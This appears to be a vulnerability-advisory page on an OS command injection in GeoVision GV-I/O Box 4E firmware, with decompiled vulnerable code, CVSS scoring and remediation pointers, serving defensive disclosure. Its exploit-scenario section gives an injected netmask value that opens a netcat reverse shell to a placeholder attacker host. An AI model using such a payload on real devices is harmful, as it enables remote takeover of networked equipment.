Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Network-reachable config RPC, trivial injection (AC:L), but PR:H because invoking the netmask setter requires admin authority; full C/I/A on the device with Scope change to attached units.
Primary rating from Vendor (GV).
CVSS VectorVendor: GV
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.
libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)
CNetSetObj::m_F_n_Set_Net_Mask command injection
The following function takes a string as a net mask address, performs no sanitization on it and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.
int __fastcall CNetSetObj::m_F_n_Set_Net_Mask(const char **this, char *netmask_addr)
{
bool v2; // zf
char v4[72]; // [sp+0h] [bp-48h] BYREF
v2 = *this == 0;
if ( *this )
v2 = netmask_addr == 0;
if ( v2 )
return 0;
sprintf(v4, "/sbin/ifconfig %s netmask %s", *this, netmask_addr); // attacker controlled netmask_addr
system(v4);
return 1;
}
AnalysisAI
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers who can reach the device's network services to execute arbitrary shell commands via unsanitised netmask input passed to system() inside libNetSetObj.so. The flawed CNetSetObj::m_F_n_Set_Net_Mask routine is reachable through both the network-exposed DVRSearch service and the Network.cgi endpoint, yielding code execution in the context of the configuration daemon. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Attacker must reach the GV-I/O Box 4E over the network on either the DVRSearch service port or the HTTP interface serving Network.cgi, and per CVSS PR:H must possess high-privileged (administrative) credentials accepted by those interfaces in order to invoke the netmask-setter code path in libNetSetObj.so. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS:3.1 vector AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H yields 9.1 Critical, but the PR:H metric is the decisive signal: exploitation requires the caller to already have administrative authority to invoke the network-configuration RPC or CGI, which contradicts the description's suggestion that 'a network request' alone is sufficient - verify with the vendor whether DVRSearch authentication is enforced by default, because if it is not, real-world risk is closer to PR:N and the score should be 9.8/10.0. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained or guessed administrative credentials for the GV-I/O Box 4E sends a crafted Network.cgi request (or DVRSearch protocol message) setting the netmask field to a value such as '255.255.255.0; nc -e /bin/sh attacker.example 4444 #', causing libNetSetObj.so to pass the string through sprintf into system() and spawn a reverse shell running with the configuration service's privileges. No public exploit is identified at time of analysis, but the Talos report's disassembly of CNetSetObj::m_F_n_Set_Net_Mask makes a working PoC straightforward to produce. … |
| Remediation | No vendor-released patch identified at time of analysis; monitor the GeoVision cybersecurity page at https://www.geovision.com.tw/cyber_security.php and the Talos advisory at https://talosintelligence.com/vulnerability_reports/TALOS-2026-2379 for a firmware update superseding 2.09 and apply it on availability. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: (1) Identify and inventory all GeoVision GV-I/O Box 4E devices on the network, documenting current firmware versions; (2) Apply network-level access restrictions via firewall rules to limit exposure. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Gv I O Box 4E
View allStack-based buffer overflow in GeoVision GV-I/O Box 4E embedded I/O controllers allows unauthenticated network attackers
Remote unauthenticated stack-based buffer overflow in GeoVision GV-I/O Box 4E smart I/O appliances allows any host on th
Stack-based buffer overflow in the GeoVision GV-I/O Box 4E DVRSearch service allows unauthenticated network attackers to
Stack-based buffer overflow in GeoVision GV-I/O Box 4E allows unauthenticated remote attackers to overflow a fixed-size
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows authenticated remote attackers to execute arbitrary
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows remote attackers with high privileges to execute ar
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute ar
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38651
GHSA-vrqf-28p4-6h8f